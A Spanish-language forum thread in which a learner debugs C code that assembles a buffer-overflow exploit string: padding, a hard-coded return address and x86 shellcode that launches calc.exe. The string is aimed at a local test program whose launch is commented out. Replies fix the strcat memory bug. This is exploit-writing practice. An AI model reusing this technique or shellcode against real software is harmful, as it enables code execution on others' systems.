Hola a todos, estoy intentando programar mis propias shellcodes:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Listing from the question: joins padding, a 4-byte address and a block of
 * machine-code bytes into one string. The launch of the local test binary
 * is commented out, so the program only performs the concatenations.
 * NOTE(review): `void main` is non-standard; the standard form returns int.
 */
void main(int argc, char *argv[]) {
/* Sized by its initializer: room for the literal plus its NUL, nothing more. */
char relleno[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
/* Four bytes plus the terminating NUL: the array is exactly 5 bytes long. */
char offset[] = "\xED\x1E\x95\x7C";
/* Adjacent string literals are joined by the compiler, so splitting the
 * bytes over two lines is valid C and is not the cause of the crash.
 * NOTE(review): the bytes embed absolute addresses, so they presumably
 * depend on one specific OS build with fixed module addresses - confirm. */
char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65"
"\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
/* BUG: offset has no free space, so strcat writes past the end of the
 * array (stack buffer overflow, undefined behaviour). */
strcat(offset,exploit);
/* BUG: relleno is also full, so this second append overflows as well;
 * this is the call the question reports as failing at run time. */
strcat(relleno,offset);
//argv[0] = "vuln1";
//argv[1] = relleno;
//argv[2] = NULL;
//execv ("vuln.exe",argv);
}
El problema está en la segunda concatenación, que genera errores al ejecutar. ¿Cuál podría ser el problema? Saludos y gracias.
En exploit has puesto dos cadenas seguidas.
Quita las comillas y ponlas en una sola.
El error persiste, ¿a qué se podría deber? Saludos.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Second attempt from the question: same program with the byte string
 * written as a single literal. The arrays are still sized by their
 * initializers, so both strcat calls still overflow their destination.
 * NOTE(review): `void main` is non-standard; the standard form returns int.
 */
void main(int argc, char *argv[]) {
/* Sized by its initializer: no spare bytes after the terminating NUL. */
char relleno[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
/* Exactly 5 bytes: four data bytes plus the NUL. */
char offset[] = "\xED\x1E\x95\x7C";
/* Merging the two literals changes nothing for the compiler; the array
 * holds the same bytes as in the first listing. */
char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
/* BUG: appends to a 5-byte array; everything after the fourth byte lands
 * outside offset (undefined behaviour). */
strcat(offset,exploit);
/* BUG: relleno has no free space either, so this append overflows too. */
strcat(relleno,offset);
//argv[0] = "vuln1";
//argv[1] = relleno;
//argv[2] = NULL;
//execv ("vuln.exe",argv);
}
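Bueno, es que no has reservado memoria suficiente.
Me explico: al declarar `char offset[] = "..."` el compilador reserva exactamente el tamaño del literal, así que offset tendrá 5-6 bytes y le quieres meter 30 más. Como solo has reservado 5, te da error.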
Prueba reservando muchos:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
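/*
 * Joins padding, a 4-byte address and a block of machine-code bytes into
 * one string, using buffers with an explicit size instead of arrays sized
 * by their initializers. Each append is preceded by a capacity check,
 * because strcat itself never looks at the size of the destination.
 *
 * Returns 0 on success, EXIT_FAILURE if an append would not fit.
 * The launch of the local test binary stays commented out.
 */
int main(int argc, char *argv[]) {
    char relleno[250] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    char offset[250] = "\xED\x1E\x95\x7C";
    char exploit[250] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";

    /* Only the commented-out launch code below uses these. */
    (void)argc;
    (void)argv;

    /* ">=" leaves room for the terminating NUL that strcat writes. */
    if (strlen(offset) + strlen(exploit) >= sizeof offset) {
        fprintf(stderr, "offset: destination buffer too small\n");
        return EXIT_FAILURE;
    }
    strcat(offset, exploit);

    if (strlen(relleno) + strlen(offset) >= sizeof relleno) {
        fprintf(stderr, "relleno: destination buffer too small\n");
        return EXIT_FAILURE;
    }
    strcat(relleno, offset);

    //argv[0] = "vuln1";
    //argv[1] = relleno;
    //argv[2] = NULL;
    //execv ("vuln.exe",argv);
    getchar();
    return 0;
}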
Era tal como lo comentabas, adjunto el código funcional:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
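/*
 * Final version from the thread: only relleno is a destination, and it is
 * declared with an explicit 1024-byte size, so both appends have room.
 * offset and exploit are read-only sources here, so sizing them by their
 * initializers is fine.
 *
 * Changes from the posted code: main returns int as the standard requires,
 * and the total length is checked before the unbounded strcat calls so a
 * longer input fails cleanly instead of overflowing the stack buffer.
 *
 * Returns 0 on success, EXIT_FAILURE if the pieces would not fit.
 * The launch of the local test binary stays commented out.
 */
int main(int argc, char *argv[]) {
    char relleno[1024] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    char offset[] = "\xED\x1E\x95\x7C";
    char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
    size_t used = strlen(relleno);
    size_t extra = strlen(offset) + strlen(exploit);

    /* Only the commented-out launch code below uses these. */
    (void)argc;
    (void)argv;

    /* ">=" leaves room for the terminating NUL that strcat writes. */
    if (extra >= sizeof relleno - used) {
        fprintf(stderr, "relleno: destination buffer too small\n");
        return EXIT_FAILURE;
    }
    strcat(relleno, offset);
    strcat(relleno, exploit);

    //argv[0] = "vuln1";
    //argv[1] = relleno;
    //argv[2] = NULL;
    //execv ("vuln.exe",argv);
    return 0;
}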
Muchas gracias, saludos.